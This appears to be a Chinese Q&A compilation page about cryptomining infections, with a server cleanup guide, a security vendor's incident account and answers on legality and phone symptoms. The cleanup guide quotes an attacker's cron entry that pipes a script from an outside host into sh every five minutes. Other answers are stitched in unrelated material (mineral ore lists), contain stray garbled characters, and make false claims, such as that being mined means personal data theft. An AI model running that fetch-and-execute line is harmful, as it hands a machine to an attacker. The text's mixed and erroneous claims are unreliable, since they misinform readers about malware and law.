上网站被挖矿

『壹』 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

『贰』 最近听说进入不良网站，黑客会拿我们的手机挖矿啥的，自动弹出的不良网站我点进去一秒就退了，被挖矿吗

没有想的那么神奇。。现在的不良网站一般都是教人如何赌博。。如何打架什么的。通常会有赌博网站的连接在里面。。诱惑你去赌博的。。没有什么挖矿什么的。。退出去以后。重启下手机。。基本就正常了。。

『叁』 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

『肆』 当你浏览不良网站的时候，黑客们在干什么

区块律动 BlockBeats 做了个统计，截至7月9号，全网有超过3万家网站内置了“挖矿”代码，只要用户打开网站进行浏览、操作，网站就会调用电脑或手机的计算资源，来进行“挖矿”。

如果你有浏览“黄色”网站的习惯，那你也应该注意一下，因为不少“黄色”网站未来增加收入也会加入“挖矿”代码，除了网站所有者自行添加“挖矿”代码之外，还有黑客黑入其他网站服务在代码中，恶意植入“挖矿”代码木马的情况。是不是很可怕呢？小伙伴们有没有遇到过手机莫名其妙发烫的现象呢？

『伍』 网上挖矿是什么意思

一、网上的“挖矿”，指的是“矿工”根据设计者提供的开源软件，提供一定的计算机运算力，通过复杂的数学运算，求得方程式特解的过程，求得特解的“矿工”可以得到特定数量的比特币等虚拟货币奖励。而所需的“铲子”就是配置较高，运算速度足够快的计算机，“矿工”也就是操纵电脑的使用者。网上“挖矿”的能源消耗和碳排放量大，对国民经济贡献度低，对产业发展、科技进步等带动作用有限。
二、多部门联合开展全面全链条围剿虚拟货币“挖矿”行为，人民银行会同有关部门印发了《关于进一步防范和处置虚拟货币交易炒作风险的通知》，明确虚拟货币相关业务活动属于非法金融活动；国家发改委公开征求《市场准入负面清单(2021年版)》意见时，将虚拟货币“挖矿”活动列入淘汰类，并于近期发布通报：我国将以产业式集中式“挖矿”(业界指虚拟货币的生产过程)、国有单位涉及“挖矿”和比特币“挖矿”为重点，全面整治虚拟货币“挖矿”活动。
拓展资料：
一、矿产资源的分类，主要有：
1、根据矿产的成因和形成条件，分为内生矿产、外生矿产和变质矿产；
2、根据矿产的物质组成和结构特点，分为无机矿产和有机矿产；
3、根据矿产的产出状态，分为固体矿产、液体矿产和气体矿产；
4、根据矿产特性及其主要用途，分为能源矿产、金属矿产、非金属矿产和水气矿产。
二、我国已探明储量的金属矿产有54种，即：铁矿、锰矿、铬矿、钛矿、钒矿、铜矿、铅矿、锌矿、铝土矿、镁矿、镍矿、钴矿、钨矿、锡矿、铋矿、钼矿、汞矿、锑矿、铂族金属(铂矿、钯矿、铱矿、铑矿、锇矿、钌矿)、金矿、银矿、铌矿、钽矿、铍矿、锂矿、锆矿、锶矿、铷矿、铯矿、稀土元素(钇矿、钆矿、铽矿、镝矿、铈矿、镧矿、镨矿、钕矿、钐矿、铕矿)、锗矿、镓矿、铟矿、铊矿、铪矿、铼矿、镉矿、钪矿、硒矿、蹄矿。

『陆』 手机被别人挖矿是什么意思

被挖矿是指浏览不良网站背后的黑客会通过程序窃取你的个人信息。
一旦出现这种情况，那么就说明你的个人信息肯定是已经泄露了，而一般的正规网站是不会泄露用户的个人信息，只有经常浏览一些钓鱼网站、盗版资源网站和不良网站，才会导致个人信息泄露。另外，申请好友的陌生人，基本都是一些带着“美女头像”，且备注的信息都充满诱导性，而目的就是为了让我们同意。

『柒』 网络挖矿违法吗有多严重

网络挖矿是犯法的。网络“挖矿”，是指计算机被植入的软件程序，会通过特定算法，在计算机上进行运算。运算完成后，自动得到特定结果，从而产生虚拟币，这些虚拟币可在第三方平台换算，从而信并高获得真实货币的行为，我国法律明确禁止公民有加密货币挖矿交易的行为。网络挖矿犯法吗网络挖矿是犯法的。网络“挖矿”，是指计算机被植入的软件程序，会通过特定算法，在计算机上进行运算。运算完成后，自动得到特定结果，从而产生虚拟币，这些虚拟币可在第三方平台换算，从而获得真实货币的行为，我国法律明确禁止公民有加密货币挖矿交易的行为。网络挖矿犯法吗的法律依据《刑法》第二百八十五条
违反国家规定，侵入国家事务、国防建设、蔽州尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。
违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处滑尺或者单处罚金;情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。
提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。

『捌』 无线网被破解拿去挖矿什么意思

其实是集成一些程序在路由器里，然后可以收集你的空闲上传带宽（一般人的上传带宽都用不着，会浪费掉），然后给你回报，这个过程就是挖矿。
虚拟货币的生产过程被称为“挖矿”，属于违法行为。
需要用电脑搜寻64位的数字就行，然后通过反复解谜密与其他淘金者相互竞争，为比特币网络提供所需的数字，如果用户的电脑成功地创造出一组数字，那么就将会获得25个比特币。简单来说就是来寻找比特币。
由于比特币系统采用了分散化编程，所以在每10分钟内只能获得25个比特币，而到2140年，流通的比特币上限将会达到2100万。换句话说，比特币系统是能够实现自给自足的，通过编码来抵御通胀，并防止他人对这些代码进行破坏。

『玖』 玩网络游戏也能被网通公司涉嫌挖矿吗

所谓网络“挖矿”，是指计算机被植入的软件程序，会通过特定算法，在计算机上进行运算。运算完成后，自动得到特定结果，从而产生虚拟币，这些虚拟币可在第三方平台换算，获得真实货币。由于这种程序的非破坏性和隐蔽性，即使用户电脑中毒也不会像勒索病毒一样即时感知到。挖矿木马只会潜伏在用户的电脑中，定时启动挖矿程序进行计算，大量消耗用户电脑资源，导致用户电脑性能变低，运行速度变慢，使用寿命变短，甚至烧坏电脑硬件。所以玩网络游戏不会被网通公司涉嫌挖矿的。

『拾』 手机被植入挖矿代码怎么办，访问不良网站后手机变卡

清除手机数据，如果有重要的东西先保存在网盘上，然后再恢复出厂设置三次，这样比较安全，